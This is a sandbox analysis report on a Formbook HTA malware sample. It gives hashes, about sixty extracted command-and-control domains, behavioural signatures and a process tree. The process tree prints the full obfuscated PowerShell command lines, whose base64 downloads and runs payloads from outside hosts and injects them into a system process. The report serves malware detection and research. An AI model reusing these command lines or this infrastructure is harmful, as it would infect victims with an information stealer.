Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20250129-en -
resource tags
arch:x64arch:x86image:win10v2004-20250129-enlocale:en-usos:windows10-2004-x64system -
submitted
04/02/2025, 05:37
Static task
static1
Behavioral task
behavioral1
Sample
nicetomeetyoulittleheartsweetheartsheisbeautifulgirl.hta
Resource
win7-20240903-en
General
-
Target
nicetomeetyoulittleheartsweetheartsheisbeautifulgirl.hta
-
Size
14KB
-
MD5
24a0a0feeb3c8ddf4e0a8480107d5a47
-
SHA1
826364c4e1b951b3cb5d0c5d82db4a8e59e05140
-
SHA256
56966ff863d37f048e873725f57c3d6ea7883c4c20c033f2bd5f85adeec1b62b
-
SHA512
2c318b518bf94a264dfc6ae8938a00b7f915a38f7105b4c7df7799fd242b9906e4147644f26b5f2ecdcf892f5186efcd9c5182ef1e8f155b460a24d7ba5cac3e
-
SSDEEP
48:3aodOOQvMUUdOOQHnMUvMxyhz+rntkpyr+slA6Y8TurdkGijmQdkrC3dOOQe0dO1:qoOMhQM1AhmtscdlRB/arEY/PMfW+
Malware Config
Extracted
formbook
4.1
b101
ent-apartments-2801.click
lsyw.top
eccurastock.online
j958.net
eepelement.tech
rueblueimpact.shop
etechhome.net
ianchui.cfd
mall-business-22321.bond
tatewidefinancialservices.net
orbitmac.info
ovehkjepe88.club
zzhmamn.xyz
uslimbooking.net
uto253.pro
ortalexpresscliepr.lat
tikk.shop
iaoniang.cfd
sdg-6603.cyou
myd.net
motionen-es.online
dnrkdek.xyz
areo.care
tockcoin.online
ilvaguard.info
estserverhost.net
ndda.tokyo
atieowen.art
eviewedapproved.net
nujstore.online
-incad-id017.top
eat-pumps-40508.bond
ngjbmfi.xyz
pepeb.xyz
eancaba.net
hmadfawad.realtor
ratinacaite.top
etcal.shop
hostassets.sucks
gsn.xyz
345.top
rkzqzxp.xyz
azablog.online
klerip.xyz
mjoh.info
69.fyi
ashqhshhq-hqaishahsq.cyou
obri.online
k7nsfyf.top
ulebuy.website
al5.xyz
nsac-atendimentos.online
linko-win.art
eroplane.bet
ahilamoney.world
ires-70107.bond
8zhuan357.yachts
ometa-casino-hzu.top
kdigitaltouchclass.online
ildiztek.xyz
andar-jaya4d.info
ayna.website
in-up-casino-nvq8.top
eepseek-ai-assistant.online
3rdwi.click
Signatures
-
Formbook family
-
Formbook payload 2 IoCs
resource yara_rule behavioral2/memory/3892-89-0x0000000000400000-0x000000000042F000-memory.dmp formbook behavioral2/memory/3360-93-0x0000000000690000-0x00000000006BF000-memory.dmp formbook -
Blocklisted process makes network request 3 IoCs
flow pid Process 18 4120 powershell.exe 21 3920 powershell.exe 22 3920 powershell.exe -
Evasion via Device Credential Deployment 2 IoCs
pid Process 4424 cmd.exe 4120 powershell.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000\Control Panel\International\Geo\Nation WScript.exe -
pid Process 3920 powershell.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 3920 set thread context of 3892 3920 powershell.exe 98 PID 3892 set thread context of 3440 3892 aspnet_compiler.exe 56 PID 3360 set thread context of 3440 3360 msdt.exe 56 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 9 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msdt.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-70482961-775596374-3727440602-1000_Classes\Local Settings powershell.exe -
Suspicious behavior: EnumeratesProcesses 62 IoCs
pid Process 4120 powershell.exe 4120 powershell.exe 3920 powershell.exe 3920 powershell.exe 3920 powershell.exe 3920 powershell.exe 3892 aspnet_compiler.exe 3892 aspnet_compiler.exe 3892 aspnet_compiler.exe 3892 aspnet_compiler.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe 3360 msdt.exe -
Suspicious behavior: MapViewOfSection 5 IoCs
pid Process 3892 aspnet_compiler.exe 3892 aspnet_compiler.exe 3892 aspnet_compiler.exe 3360 msdt.exe 3360 msdt.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
description pid Process Token: SeDebugPrivilege 4120 powershell.exe Token: SeDebugPrivilege 3920 powershell.exe Token: SeDebugPrivilege 3892 aspnet_compiler.exe Token: SeShutdownPrivilege 3440 Explorer.EXE Token: SeCreatePagefilePrivilege 3440 Explorer.EXE Token: SeDebugPrivilege 3360 msdt.exe -
Suspicious use of UnmapMainImage 1 IoCs
pid Process 3440 Explorer.EXE -
Suspicious use of WriteProcessMemory 33 IoCs
description pid Process procid_target PID 4800 wrote to memory of 4424 4800 mshta.exe 86 PID 4800 wrote to memory of 4424 4800 mshta.exe 86 PID 4800 wrote to memory of 4424 4800 mshta.exe 86 PID 4424 wrote to memory of 4120 4424 cmd.exe 88 PID 4424 wrote to memory of 4120 4424 cmd.exe 88 PID 4424 wrote to memory of 4120 4424 cmd.exe 88 PID 4120 wrote to memory of 3628 4120 powershell.exe 92 PID 4120 wrote to memory of 3628 4120 powershell.exe 92 PID 4120 wrote to memory of 3628 4120 powershell.exe 92 PID 3628 wrote to memory of 4512 3628 csc.exe 93 PID 3628 wrote to memory of 4512 3628 csc.exe 93 PID 3628 wrote to memory of 4512 3628 csc.exe 93 PID 4120 wrote to memory of 3164 4120 powershell.exe 94 PID 4120 wrote to memory of 3164 4120 powershell.exe 94 PID 4120 wrote to memory of 3164 4120 powershell.exe 94 PID 3164 wrote to memory of 3920 3164 WScript.exe 95 PID 3164 wrote to memory of 3920 3164 WScript.exe 95 PID 3164 wrote to memory of 3920 3164 WScript.exe 95 PID 3920 wrote to memory of 5100 3920 powershell.exe 97 PID 3920 wrote to memory of 5100 3920 powershell.exe 97 PID 3920 wrote to memory of 5100 3920 powershell.exe 97 PID 3920 wrote to memory of 3892 3920 powershell.exe 98 PID 3920 wrote to memory of 3892 3920 powershell.exe 98 PID 3920 wrote to memory of 3892 3920 powershell.exe 98 PID 3920 wrote to memory of 3892 3920 powershell.exe 98 PID 3920 wrote to memory of 3892 3920 powershell.exe 98 PID 3920 wrote to memory of 3892 3920 powershell.exe 98 PID 3440 wrote to memory of 3360 3440 Explorer.EXE 99 PID 3440 wrote to memory of 3360 3440 Explorer.EXE 99 PID 3440 wrote to memory of 3360 3440 Explorer.EXE 99 PID 3360 wrote to memory of 4988 3360 msdt.exe 100 PID 3360 wrote to memory of 4988 3360 msdt.exe 100 PID 3360 wrote to memory of 4988 3360 msdt.exe 100
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicetomeetyoulittleheartsweetheartsheisbeautifulgirl.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4800 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C PoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"3⤵
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePoWeRSHelL.exE -EX BYPAsS -nOp -W 1 -c dEVICeCREdEnTIAlDeplOymEnT.Exe ; inVoKe-ExprEsSion($(INVOKe-exPrESSiON('[sYSTEM.Text.EncOdINg]'+[chAr]58+[CHAR]0X3A+'UTF8.GetsTRIng([SYSTem.cONVErt]'+[CHAr]0x3a+[CHaR]0X3a+'FroMbAsE64sTRING('+[ChAr]0X22+'JDdCUEZBRDBaMCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZU1CRXJkZUZJbklUSU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNb24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZrcU16UmNQTyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVVl6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBreVhyTGRULHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZmcsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGJmYSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTkFtZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAieENOZGVoTGkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgckV4SEljZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ3QlBGQUQwWjA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTguMjMuMTg3LjE1MC94YW1wcC9mYm4vbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZnUuZ0lGIiwiJEVOdjpBUFBEQVRBXG5pY2V0b21lZXR5b3VsaXR0bGVoZWFydHN3ZWV0aGVhcnRzaGVpc2JlYXV0aWYudmJzIiwwLDApO1NUQVJULXNMRWVQKDMpO0ludk9LRS1pVGVtICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU5WOkFQUERBVEFcbmljZXRvbWVldHlvdWxpdHRsZWhlYXJ0c3dlZXRoZWFydHNoZWlzYmVhdXRpZi52YnMi'+[CHAR]0x22+'))')))"4⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4120 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\c4p2mdyp\c4p2mdyp.cmdline"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3628 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD419.tmp" "c:\Users\Admin\AppData\Local\Temp\c4p2mdyp\CSC5FDA28BE35D54929AE7AB778D87BF34D.TMP"6⤵
- System Location Discovery: System Language Discovery
PID:4512
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicetomeetyoulittleheartsweetheartsheisbeautif.vbs"5⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3164 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABvAHIAaQBnAGkAbgBhAGwAVABlAHgAdAAgAD0AIAAnAHQAeAB0AC4AZQBtAHIAbwBmAG4AZQBlAHMAcgBlAHYAZQByAG8AZgBsAHIAaQBnAGwAdQBmAGkAdAB1AGEAZQBiAGwAcgBpAGcAdABzAGUAYgBsAHIAaQBnAGUAYwBpAG4ALwBuAGIAZgAvAHAAcABtAGEAeAAvADAANQAxAC4ANwA4ADEALgAzADIALgA4ADkAMQAvAC8AOgBwAHQAdABoACcAOwAkAHIAZQBzAHQAbwByAGUAZABUAGUAeAB0ACAAPQAgACQAbwByAGkAZwBpAG4AYQBsAFQAZQB4AHQAIAAtAHIAZQBwAGwAYQBjAGUAIAAnACMAJwAsACAAJwB0ACcAOwAkAGkAbQBhAGcAZQBVAHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwByAGUAcwAuAGMAbABvAHUAZABpAG4AYQByAHkALgBjAG8AbQAvAGQAYQB4AHcAdQBhADYAMwB5AC8AaQBtAGEAZwBlAC8AdQBwAGwAbwBhAGQALwB2ADEANwAzADgAMwAzADQANQAzADMALwBhAGwAYwBiADQAaAB0AG8AbAB6AHYAZgBoAHoAegB1AGYAcQBoADUALgBqAHAAZwAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAWwBDAGwAYQBzAHMATABpAGIAcgBhAHIAeQAxAC4ASABvAG0AZQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAG0AYQBpAG4AJwApAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgAFsAbwBiAGoAZQBjAHQAWwBdAF0AIABAACgAJAByAGUAcwB0AG8AcgBlAGQAVABlAHgAdAAsACcAZgBhAGwAcwBlACcALAAnAGEAcwBwAG4AZQB0AF8AYwBvAG0AcABpAGwAZQByACcALAAnAGYAYQBsAHMAZQAnACkAKQA=')) | Invoke-Expression"6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵PID:5100
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"7⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:3892
-
-
-
-
-
-
-
C:\Windows\SysWOW64\msdt.exe"C:\Windows\SysWOW64\msdt.exe"2⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\cmd.exe/c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
PID:4988
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5fb1df442f2cee34456c6ed9064318559
SHA1729e8f61f181b303d25e1f709399db242d82c6c2
SHA25675207b26127c0778928b2c0ce51d371a1b4f5a4c47596902f88dbff9ddd16a79
SHA512d6df1b8e17733d65ae332d20a22fcbc2cdec8df38a705b694b4d87b2f0c9c287378791c3da2cb2142e95f31df1b4209e01a17a83eabfcb2175f38a9207ad0294
-
Filesize
19KB
MD506bae8a862675c1fc193c785f78932a2
SHA1e185c5a6c6fb099666c2ccaf33a9e1ea216209b2
SHA2569c845ea914e8c752541fa67526b6da2e8225db9757996bb7633839297ce5916b
SHA51240f9e757bff6772e648823e4ae7f4f855c28a36fabf944f72096b5523d60e6a81e127740724469d013211576595a8e84ef1eb8a08ce7311500dfb740a19d5938
-
Filesize
1KB
MD52d24d6ba76c2ac81d34977c31e0dd8bb
SHA15bcc249216a67886433ddd83a72d73af09cf8848
SHA25640fb3431d28d41170ec09758b6e32d3df824a0943da2415d039143216c0b1dfc
SHA512470078e9dd5c4e2801831d5e3e8331e3924935c454efa50835565af75616fc22e95b9152f9454aeb0f8b0b69aaf64edfb64c8c10af5289a613558fe906fc890f
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD5e95fc663f8d6eaa7efbad0b69d87dcef
SHA1e16cdc108c151d0e892b79121209bae353f98557
SHA2568e8d88bffeacdb3e326108ddd14a0896561b6ce82281f89a2080b2b0223c0c2c
SHA51253282280a36f51441f8fff6723f75d8e81762307cb57818904a9141e36ad06669fdce3674ef0c1ce4126ec4657a57d54f9bdf4d5d0d7fe0e59461eae7ffa856d
-
Filesize
216KB
MD5eaaecea977e9d02eb3ba12a426b9930d
SHA11b1d388b1aace23874ab95ad625f1e34ee43e234
SHA2565b8920b32beba0b9c5cadf86e0e48d3df9cf33b89ed878efc06ca07ba7122f18
SHA512929d244152855e99319f46f0f7d022fa127d4f628afebd26b6597e8c10265ba75eb9f1150dc0346ef51719f331f62a13669a8a366d2689996788b0d2601121e8
-
Filesize
652B
MD50e4d96b486966c3bb929d537e0fe76c4
SHA1d5d09f5092a67c157f83693d7ca0597f5d41b0bd
SHA2566e9acf919696bd258b2cd03729c75ac606b98299163c2c8c09d52b39e5af048f
SHA5128acade0db52ba105ac4c5cc1d17d3b98db6eed78c595ebd72a967b410115b325dd3c04e5a4d7239faf7303a467f7bf158d17195c991b0c7d400aa8fb5a8cf901
-
Filesize
478B
MD519c349f194ea440d75e3d8bb016a48c1
SHA1e4c63d11e4345744be72671c3f698ba717fca329
SHA25654d8a84d51dffcb3b93aa8c8571f35fcf1c6a567574a138f9b803479b6aad974
SHA512c9cc5ac32184f5771a22e8ff0de1812d4e4e0e1a8236d8660be761382983eeced98333ff6845c70ab999c52a94d64939e50d24cc4b3caab4d80c79e5267dfb71
-
Filesize
369B
MD5c20891827c531ede192964d6e7519fe1
SHA1a670324108f68c93e06872201a3c8e7d068fa95f
SHA256d0d6cc4601c1dfcd26cce379938bcd3f1b1fde22a0fb5ebc8d4962efa2b7d644
SHA512c601d70f7a424c24535870d68d1b9c3201177ddb21cd7f2f84c3907b7f4252744b9a84a8cb831cf7e30c7a1cf8b49cfaab704f3e5629153f90eb159eadf05e77